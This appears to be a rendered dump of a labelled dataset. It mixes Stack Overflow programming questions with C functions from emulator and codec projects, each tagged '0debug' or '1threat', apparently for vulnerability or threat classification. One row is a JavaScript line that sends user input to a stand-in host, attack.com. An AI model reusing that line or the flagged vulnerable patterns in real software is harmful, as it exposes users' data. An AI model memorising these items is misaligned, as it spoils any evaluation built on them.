<p>I run the following error: <code>ValueError: The truth value of a Series is ambiguous. Use a.empty, a.bool(), a.item(), a.any() or a.all().</code> Which I think I solved it by:</p>
<pre><code>if doc_set is not None:
print(ldamodel[doc_set[1]])
</code></pre>
<p>Nevertheless, now I get the following error: <code>IndentationError: expected an indented block</code>. I am looking for the intuition of the error rather than the correction, I cannot put my whole LDA for reproduction because it is too massive. Thanks in advance!</p>
| 0debug
|
what is the different between string and stringbuilder in the code? : <p>i would like to know why the output of this code is "roar roar!!!" not "roar!!! roar!!!"?
the code is:</p>
<pre><code> public class Lion
{
public void roar(String roar1, StringBuilder roar2) {
roar1.concat("!!!");
roar2.append("!!!");
}
public static void main(String[] args)
{
String roar1 = "roar";
StringBuilder roar2 = new StringBuilder("roar");
new Lion().roar(roar1, roar2);
System.out.println(roar1 + " " + roar2);
} }
</code></pre>
<p>i try to find the reason of method concat() dont appends one String to the end of another. please with explain. </p>
| 0debug
|
target_phys_addr_t memory_region_section_get_iotlb(CPUArchState *env,
MemoryRegionSection *section,
target_ulong vaddr,
target_phys_addr_t paddr,
int prot,
target_ulong *address)
{
target_phys_addr_t iotlb;
CPUWatchpoint *wp;
if (memory_region_is_ram(section->mr)) {
iotlb = (memory_region_get_ram_addr(section->mr) & TARGET_PAGE_MASK)
+ memory_region_section_addr(section, paddr);
if (!section->readonly) {
iotlb |= phys_section_notdirty;
} else {
iotlb |= phys_section_rom;
}
} else {
iotlb = section - phys_sections;
iotlb += memory_region_section_addr(section, paddr);
}
QTAILQ_FOREACH(wp, &env->watchpoints, entry) {
if (vaddr == (wp->vaddr & TARGET_PAGE_MASK)) {
if ((prot & PAGE_WRITE) || (wp->flags & BP_MEM_READ)) {
iotlb = phys_section_watch + paddr;
*address |= TLB_MMIO;
break;
}
}
}
return iotlb;
}
| 1threat
|
window.location.href = 'http://attack.com?user=' + user_input;
| 1threat
|
What view/layout would work best for this Android fragment? : <p>I am trying to create a view like this in an Android fragment, and after doing a good amount of research, I am still unsure what the best way to go about doing this <strong><em>in a fragment</em></strong>.</p>
<p>It appears to possibly need 2 different layouts, but I could also be very incorrect. I am new to Android and appreciate any help I can get. </p>
<p><a href="https://i.stack.imgur.com/DH4pK.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/DH4pK.png" alt="Attempted fragment layout"></a></p>
<p>Thank you!</p>
| 0debug
|
char *qemu_find_file(int type, const char *name)
{
int len;
const char *subdir;
char *buf;
if (access(name, R_OK) == 0) {
return g_strdup(name);
}
switch (type) {
case QEMU_FILE_TYPE_BIOS:
subdir = "";
break;
case QEMU_FILE_TYPE_KEYMAP:
subdir = "keymaps/";
break;
default:
abort();
}
len = strlen(data_dir) + strlen(name) + strlen(subdir) + 2;
buf = g_malloc0(len);
snprintf(buf, len, "%s/%s%s", data_dir, subdir, name);
if (access(buf, R_OK)) {
g_free(buf);
return NULL;
}
return buf;
}
| 1threat
|
bad_alloc in std::vector constructor : <p><code>std::vector</code> has a constructor where passing a single argument of <code>size_type count</code> should size the vector with <code>count</code> default-constructed elements. But the following code fails with a <code>bad_alloc</code> exception after a bad conversion:</p>
<pre><code>#include <vector>
struct Inner {
int foo;
char buf[256];
};
template <typename Type>
struct Outer
{
typedef std::vector<Inner> BufContainer;
typedef typename BufContainer::size_type BufIndex;
BufContainer bufs1;
BufContainer bufs2;
const BufIndex BUFCOUNT = 32;
Outer() :
bufs1(32), // fine
bufs2(BUFCOUNT) // bad_alloc
{ }
};
int main() {
Outer<int> outer;
}
</code></pre>
<p>When I look in the debugger, I can see an incorrect conversion has occurred on that second vector constructor:</p>
<pre><code>#13 0x0000000000400bf1 in Outer<int>::Outer (this=0x7ffdc59570c0) at wtf.cc:22
22 bufs2(BUFCOUNT)
(gdb) down
#12 0x0000000000400d6e in std::vector<Inner, std::allocator<Inner> >::vector (this=0x7ffdc59570d8, __n=140727918359008, __a=...) at /usr/local/gcc-4.9.1/include/c++/4.9.1/bits/stl_vector.h:278
278 : _Base(__n, __a)
(gdb) list
273 * This constructor fills the %vector with @a __n default
274 * constructed elements.
275 */
276 explicit
277 vector(size_type __n, const allocator_type& __a = allocator_type())
278 : _Base(__n, __a)
279 { _M_default_initialize(__n); }
(gdb) print __n
$1 = 140727918359008
</code></pre>
<p><code>std::vector::size_type</code> is simply a typedef from <code>size_t</code>. I don't understand why my defined constant <code>BUFCOUNT</code> results in that rolled-around value inside the constructor, and would appreciate anyone helping me find the obvious thing I'm missing.</p>
| 0debug
|
How to print % as a character in printf : <p>I would like to use % as a normal character in printf lets say the output is a is 20% higher than b how would I be able to do that since % is used as a special character?</p>
| 0debug
|
Am I being Hacked? GalliumOS + Chromium : <p>I am using GalliumOS (Ubuntu 16.04 derivative) and Chromium Browser.</p>
<p>In the last week I have been informed by two major websites, Amazon and Coinbase, that the computer I have been using for the last two years is a "new device" and must be confirmed.</p>
<p>In both instances reconfirming the device via email solved the problem and I kind of forgot about it.</p>
<p>Then just now, whilst using Coinbase I was logged out because of an auth token error. I then had to log back in. 2 stage auth token is working fine.</p>
<p>Is someone trying to hack me or perhaps one of the two above mentioned sites? (I am sure someone somewhere is trying to hack them both ALL THE TIME... is someone getting close????)</p>
| 0debug
|
static int pix_norm1_c(uint8_t * pix, int line_size)
{
int s, i, j;
uint32_t *sq = ff_squareTbl + 256;
s = 0;
for (i = 0; i < 16; i++) {
for (j = 0; j < 16; j += 8) {
#if 0
s += sq[pix[0]];
s += sq[pix[1]];
s += sq[pix[2]];
s += sq[pix[3]];
s += sq[pix[4]];
s += sq[pix[5]];
s += sq[pix[6]];
s += sq[pix[7]];
#else
#if LONG_MAX > 2147483647
register uint64_t x=*(uint64_t*)pix;
s += sq[x&0xff];
s += sq[(x>>8)&0xff];
s += sq[(x>>16)&0xff];
s += sq[(x>>24)&0xff];
s += sq[(x>>32)&0xff];
s += sq[(x>>40)&0xff];
s += sq[(x>>48)&0xff];
s += sq[(x>>56)&0xff];
#else
register uint32_t x=*(uint32_t*)pix;
s += sq[x&0xff];
s += sq[(x>>8)&0xff];
s += sq[(x>>16)&0xff];
s += sq[(x>>24)&0xff];
x=*(uint32_t*)(pix+4);
s += sq[x&0xff];
s += sq[(x>>8)&0xff];
s += sq[(x>>16)&0xff];
s += sq[(x>>24)&0xff];
#endif
#endif
pix += 8;
}
pix += line_size - 16;
}
return s;
}
| 1threat
|
how to Save value in Shared Preference : I know this que asked many time but i don't understand how to set up because i am new in android.
i have tried this
[1. saved prefrence][1]
[2. also use this][2]
[1]: http://stackoverflow.com/questions/2709253/converting-a-string-to-an-integer-on-android
[2]: http://stackoverflow.com/questions/5068115/spinner-selection-save-to-sharedpreferences-then-retrieve
**Here is my Code**
list = new ArrayList<String>();
list.add("Male");
list.add("Female");
ArrayAdapter<String> dataAdapter = new ArrayAdapter<String>(getActivity(),
android.R.layout.simple_spinner_item, list);
dataAdapter.setDropDownViewResource(android.R.layout.simple_spinner_dropdown_item);
// int selectedPosition = gender.getSelectedItemPosition();
gender.setSelection(sharedpreferences.getInt("Gender1", -1));
list.indexOf(sharedpreferences.getString(Gender1, "Gender1"));
gender.setAdapter(dataAdapter);
**Please help me**
I want to store in this value when user save his account detail
**Thank you in Advance**
| 0debug
|
JAVA EE Installation for netbeans and eclipse : <p>I installed netbeans with JAVA EE but i want to use this JAVA EE version with eclipse instead of installing another version for eclipse only.</p>
| 0debug
|
static inline void RENAME(rgb24tobgr15)(const uint8_t *src, uint8_t *dst, unsigned src_size)
{
const uint8_t *s = src;
const uint8_t *end;
#ifdef HAVE_MMX
const uint8_t *mm_end;
#endif
uint16_t *d = (uint16_t *)dst;
end = s + src_size;
#ifdef HAVE_MMX
__asm __volatile(PREFETCH" %0"::"m"(*src):"memory");
__asm __volatile(
"movq %0, %%mm7\n\t"
"movq %1, %%mm6\n\t"
::"m"(red_15mask),"m"(green_15mask));
mm_end = end - 15;
while(s < mm_end)
{
__asm __volatile(
PREFETCH" 32%1\n\t"
"movd %1, %%mm0\n\t"
"movd 3%1, %%mm3\n\t"
"punpckldq 6%1, %%mm0\n\t"
"punpckldq 9%1, %%mm3\n\t"
"movq %%mm0, %%mm1\n\t"
"movq %%mm0, %%mm2\n\t"
"movq %%mm3, %%mm4\n\t"
"movq %%mm3, %%mm5\n\t"
"psllq $7, %%mm0\n\t"
"psllq $7, %%mm3\n\t"
"pand %%mm7, %%mm0\n\t"
"pand %%mm7, %%mm3\n\t"
"psrlq $6, %%mm1\n\t"
"psrlq $6, %%mm4\n\t"
"pand %%mm6, %%mm1\n\t"
"pand %%mm6, %%mm4\n\t"
"psrlq $19, %%mm2\n\t"
"psrlq $19, %%mm5\n\t"
"pand %2, %%mm2\n\t"
"pand %2, %%mm5\n\t"
"por %%mm1, %%mm0\n\t"
"por %%mm4, %%mm3\n\t"
"por %%mm2, %%mm0\n\t"
"por %%mm5, %%mm3\n\t"
"psllq $16, %%mm3\n\t"
"por %%mm3, %%mm0\n\t"
MOVNTQ" %%mm0, %0\n\t"
:"=m"(*d):"m"(*s),"m"(blue_15mask):"memory");
d += 4;
s += 12;
}
__asm __volatile(SFENCE:::"memory");
__asm __volatile(EMMS:::"memory");
#endif
while(s < end)
{
const int r= *s++;
const int g= *s++;
const int b= *s++;
*d++ = (b>>3) | ((g&0xF8)<<2) | ((r&0xF8)<<7);
}
}
| 1threat
|
calling angular Controller/Function from Javascript : <p>I am really new to Angular. I am trying to execute my code defined in a controller in my app.js file. I need to do that by a javascript.
How to do that? </p>
<p>app.js file</p>
<p><div class="snippet" data-lang="js" data-hide="false" data-console="true" data-babel="false">
<div class="snippet-code">
<pre class="snippet-code-js lang-js prettyprint-override"><code>app.controller('MyLocCtrl',function($firebaseObject){
myfunction = function () {
const rootRef = firebase.database().ref();
this.object = $firebaseObject(rootRef);
var myLatLng = {lat: -25.363, lng: 131.044};
var map = new google.maps.Map(document.getElementById('map'),{
zoom: 4,
center: myLatLng
});
var marker = new google.maps.Marker({
position: myLatLng,
map: map,
title: 'Hello World!'
});
};
}
);</code></pre>
</div>
</div>
</p>
<p>and my JS code in another page//map.html</p>
<p><div class="snippet" data-lang="js" data-hide="false" data-console="true" data-babel="false">
<div class="snippet-code">
<pre class="snippet-code-js lang-js prettyprint-override"><code> <script src="app.js"></script>
<body ng-app="app">
<div id="map" ng-app='app' ng-controller="MyLocCtrl"></div>
</body>
<script async defer
src="https://maps.googleapis.com/maps/api/js?key=AIzaSyDUX6F83LCTZ7_uQlXzR6_Q2u6BXFIvGkY&callback=angular.element(document.getElementById('map')).firebaseObject().myfunction();">
</script>
</html></code></pre>
</div>
</div>
</p>
| 0debug
|
Print the number of subarrays in an array having negative sum : <pre><code>import java.io.*;
import java.util.*;
public class Solution {
public static void main(String[] args) {
Scanner scan=new Scanner(System.in);
int n=scan.nextInt(); //taking input number of elements in the array
int[] a=new int[n];
for(int i=0;i<n;i++){
a[i]=scan.nextInt(); //taking input elements of the array
}
int count=0;
//start point
for(int i=0;i<n;i++){
//end point
for(int j=i;j<n;j++){
for(int k=i;k<=j;k++){
int sum=0;
sum+=a[k]; //calculating the sum of subarray
if(sum<0)
count++;
}
}
}
System.out.println(count); //printing the no of negative sums
}
}
</code></pre>
<p>Here there are three nested loops first loop defines the starting position second loop defines the ending position and third loop is for iterating over the elements of the subsrray and calculating their sums and if the sum is less than zero then increment the count.But with this code I am getting wrong answer.</p>
| 0debug
|
Java Sort ArrayList inside an ArrayList : <p>Im having some issues sorting a ArrayList that contains ArrayLists</p>
<pre><code>ArrayList<ArrayList<String>> multiMarkArray = new ArrayList<ArrayList<String>>();
String line;
while ((line = bufRdr.readLine()) != null) {
ArrayList<String> singleMarkArray = new ArrayList<String>();
for (String word : line.split(" ")) {
singleMarkArray.add(word);
}
Collections.swap(singleMarkArray, 0, 1);
multiMarkArray.add(singleMarkArray);
}
Collections.sort(multiMarkArray);
System.out.println(multiMarkArray);
</code></pre>
<p>Im getting the error <strong>Collections</strong> cannot be applied to (java.util.ArrayList>)</p>
<p>Can someone point me in the right direction to solving this issue?</p>
<p>Thanks</p>
| 0debug
|
React router and this.props.children - how to pass state to this.props.children : <p>I'm using React-router for the first time and I don't know how to think in it yet. Here's how i'm loading my components in nested routes.</p>
<p><strong>entry point .js</strong></p>
<pre><code>ReactDOM.render(
<Router history={hashHistory} >
<Route path="/" component={App}>
<Route path="models" component={Content}>
</Route>
</Router>,
document.getElementById('app')
);
</code></pre>
<p><strong>App.js</strong></p>
<pre><code> render: function() {
return (
<div>
<Header />
{this.props.children}
</div>
);
}
</code></pre>
<p>So the child of my App is the Content component I sent in. I'm using Flux and my App.js has the state and listens for changes, but I don't know how to pass that state down to this.props.children. Before using react-router my App.js defines all children explicitly, so passing state was natural but I don't see how to do it now.</p>
| 0debug
|
static void balloon_stats_poll_cb(void *opaque)
{
VirtIOBalloon *s = opaque;
VirtIODevice *vdev = VIRTIO_DEVICE(s);
if (!balloon_stats_supported(s)) {
balloon_stats_change_timer(s, s->stats_poll_interval);
return;
}
virtqueue_push(s->svq, &s->stats_vq_elem, s->stats_vq_offset);
virtio_notify(vdev, s->svq);
}
| 1threat
|
Is it possible to create an app with only swift ? : <p>I've started to learn swift and it is told to be a very fast language who takes over the Objective-C. But at many times, I saw it is not enough to write only with Swift and it was need others languages. So I would know if with my MacBook, Xcode and Swift only, it's possible to create app like Snapchat, Instagram WhatsApp or other.</p>
<p>Thanks you.</p>
| 0debug
|
PLSQL Can't Figure Out Left Join : I have 2 tables:
Person with column 'person_id'
Employee with column 'emp_type' = 'full' or 'part'
I need a query that returns everyone in Person, but exclude full time employees. What I'm struggling with is not all Persons are necessarily in Employee table.
Can someone help me out? Thanks!
| 0debug
|
filtering one array from another and push uncommon values to new array using angular js : I have an nested array response below :
[[222,444,555,555]]
and another one as below :
[[222,444,555,666,777,333]]
expected new array after filter :
[[666,777,333]]
| 0debug
|
I'm having a problem with this python3 problem : Would someone provide some help on this 'sum of squares' question in Python3? I know that I have to square the values in the range & add them together, but for the life of me, I am not able to figure it out and there are only 3 spaces to fill in. Please help. I have spent entirely too long on this problem.
Thank you very much,
Ken
"""
Fill in the gaps of the sum_squares function, so that it returns the sum of all the squares of numbers between 0 and x (not included). Remember that you can use the range(x) function to generate a sequence of numbers from 0 to x (not included).
"""
# Python3
def square(n):
return n*n
def sum_squares(x):
sum = 0
for n in ___:
sum += __
return __
print(sum_squares(10)) # Should be 285
| 0debug
|
static int msrle_decode_8_16_24_32(AVCodecContext *avctx, AVPicture *pic,
int depth, GetByteContext *gb)
{
uint8_t *output, *output_end;
int p1, p2, line=avctx->height - 1, pos=0, i;
uint16_t pix16;
uint32_t pix32;
unsigned int width= FFABS(pic->linesize[0]) / (depth >> 3);
output = pic->data[0] + (avctx->height - 1) * pic->linesize[0];
output_end = pic->data[0] + avctx->height * pic->linesize[0];
while (bytestream2_get_bytes_left(gb) > 0) {
p1 = bytestream2_get_byteu(gb);
if(p1 == 0) {
p2 = bytestream2_get_byte(gb);
if(p2 == 0) {
output = pic->data[0] + (--line) * pic->linesize[0];
if (line < 0) {
if (bytestream2_get_be16(gb) == 1) {
return 0;
} else {
av_log(avctx, AV_LOG_ERROR,
"Next line is beyond picture bounds (%d bytes left)\n",
bytestream2_get_bytes_left(gb));
return AVERROR_INVALIDDATA;
}
}
pos = 0;
continue;
} else if(p2 == 1) {
return 0;
} else if(p2 == 2) {
p1 = bytestream2_get_byte(gb);
p2 = bytestream2_get_byte(gb);
line -= p2;
pos += p1;
if (line < 0 || pos >= width){
av_log(avctx, AV_LOG_ERROR, "Skip beyond picture bounds\n");
return -1;
}
output = pic->data[0] + line * pic->linesize[0] + pos * (depth >> 3);
continue;
}
if ((pic->linesize[0] > 0 && output + p2 * (depth >> 3) > output_end) ||
(pic->linesize[0] < 0 && output + p2 * (depth >> 3) < output_end)) {
bytestream2_skip(gb, 2 * (depth >> 3));
continue;
} else if (bytestream2_get_bytes_left(gb) < p2 * (depth >> 3)) {
av_log(avctx, AV_LOG_ERROR, "bytestream overrun\n");
return AVERROR_INVALIDDATA;
}
if ((depth == 8) || (depth == 24)) {
for(i = 0; i < p2 * (depth >> 3); i++) {
*output++ = bytestream2_get_byteu(gb);
}
if(depth == 8 && (p2 & 1)) {
bytestream2_skip(gb, 1);
}
} else if (depth == 16) {
for(i = 0; i < p2; i++) {
*(uint16_t*)output = bytestream2_get_le16u(gb);
output += 2;
}
} else if (depth == 32) {
for(i = 0; i < p2; i++) {
*(uint32_t*)output = bytestream2_get_le32u(gb);
output += 4;
}
}
pos += p2;
} else {
uint8_t pix[3];
if ((pic->linesize[0] > 0 && output + p1 * (depth >> 3) > output_end) ||
(pic->linesize[0] < 0 && output + p1 * (depth >> 3) < output_end))
continue;
switch(depth){
case 8: pix[0] = bytestream2_get_byte(gb);
break;
case 16: pix16 = bytestream2_get_le16(gb);
break;
case 24: pix[0] = bytestream2_get_byte(gb);
pix[1] = bytestream2_get_byte(gb);
pix[2] = bytestream2_get_byte(gb);
break;
case 32: pix32 = bytestream2_get_le32(gb);
break;
}
switch(depth){
case 8:
for(i = 0; i < p1; i++)
*output++ = pix[0];
break;
case 16:
for(i = 0; i < p1; i++) {
*(uint16_t*)output = pix16;
output += 2;
}
break;
case 24:
for(i = 0; i < p1; i++) {
*output++ = pix[0];
*output++ = pix[1];
*output++ = pix[2];
}
break;
case 32:
for(i = 0; i < p1; i++) {
*(uint32_t*)output = pix32;
output += 4;
}
break;
}
pos += p1;
}
}
av_log(avctx, AV_LOG_WARNING, "MS RLE warning: no end-of-picture code\n");
return 0;
}
| 1threat
|
static ssize_t virtio_net_receive(VLANClientState *nc, const uint8_t *buf, size_t size)
{
VirtIONet *n = DO_UPCAST(NICState, nc, nc)->opaque;
struct virtio_net_hdr_mrg_rxbuf *mhdr = NULL;
size_t hdr_len, offset, i;
if (!virtio_net_can_receive(&n->nic->nc))
return -1;
hdr_len = n->mergeable_rx_bufs ?
sizeof(struct virtio_net_hdr_mrg_rxbuf) : sizeof(struct virtio_net_hdr);
if (!virtio_net_has_buffers(n, size + hdr_len))
return 0;
if (!receive_filter(n, buf, size))
return size;
offset = i = 0;
while (offset < size) {
VirtQueueElement elem;
int len, total;
struct iovec sg[VIRTQUEUE_MAX_SIZE];
total = 0;
if ((i != 0 && !n->mergeable_rx_bufs) ||
virtqueue_pop(n->rx_vq, &elem) == 0) {
if (i == 0)
return -1;
fprintf(stderr, "virtio-net truncating packet: "
"offset %zd, size %zd, hdr_len %zd\n",
offset, size, hdr_len);
exit(1);
}
if (elem.in_num < 1) {
fprintf(stderr, "virtio-net receive queue contains no in buffers\n");
exit(1);
}
if (!n->mergeable_rx_bufs && elem.in_sg[0].iov_len != hdr_len) {
fprintf(stderr, "virtio-net header not in first element\n");
exit(1);
}
memcpy(&sg, &elem.in_sg[0], sizeof(sg[0]) * elem.in_num);
if (i == 0) {
if (n->mergeable_rx_bufs)
mhdr = (struct virtio_net_hdr_mrg_rxbuf *)sg[0].iov_base;
offset += receive_header(n, sg, elem.in_num,
buf + offset, size - offset, hdr_len);
total += hdr_len;
}
len = iov_from_buf(sg, elem.in_num,
buf + offset, size - offset);
total += len;
virtqueue_fill(n->rx_vq, &elem, total, i++);
offset += len;
}
if (mhdr)
mhdr->num_buffers = i;
virtqueue_flush(n->rx_vq, i);
virtio_notify(&n->vdev, n->rx_vq);
return size;
}
| 1threat
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.